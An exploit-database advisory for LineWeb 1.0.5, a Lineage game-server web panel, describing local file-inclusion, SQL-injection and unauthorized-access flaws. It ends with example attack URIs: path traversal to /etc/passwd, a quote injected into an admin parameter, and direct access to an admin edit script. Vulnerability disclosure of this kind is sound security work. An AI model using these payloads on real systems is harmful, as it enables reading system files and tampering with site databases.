L2Web LineWeb 1.0.5 - Multiple Input Validation Vulnerabilities

2010-01-06T00:00:00
ID EXPLOITPACK:006AD447622F3137B4AE4F33149F0ED0
Type exploitpack
Reporter Ignacio Garrido
Modified 2010-01-06T00:00:00

Description

L2Web LineWeb 1.0.5 - Multiple Input Validation Vulnerabilities

                                        
                                            source: https://www.securityfocus.com/bid/40577/info

LineWeb is prone to multiple input-validation vulnerabilities because it fails to adequately sanitize user-supplied input. These vulnerabilities include multiple local file-include vulnerabilities, multiple SQL-injection vulnerabilities, and an unauthorized-access vulnerability.

An attacker can exploit these vulnerabilities to obtain potentially sensitive information, execute arbitrary local scripts in the context of the webserver process, obtain unauthorized access to restricted scripts, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

LineWeb 1.0.5 is vulnerable; other versions may be affected. 

The following example URIs are available:

http://www.example.com/Lineage ACM/lineweb_1.0.5/index.php?op=../../../../../../../etc/passwd
http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/index.php?op=../../../../../../../etc/passwd
http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/edit_news.php?newsid=%27
http://www.example.com/Lineage%20ACM/lineweb_1.0.5/admin/edit_ads.php?ad_id=1&ad_name=a&ad_content=ARGENTINA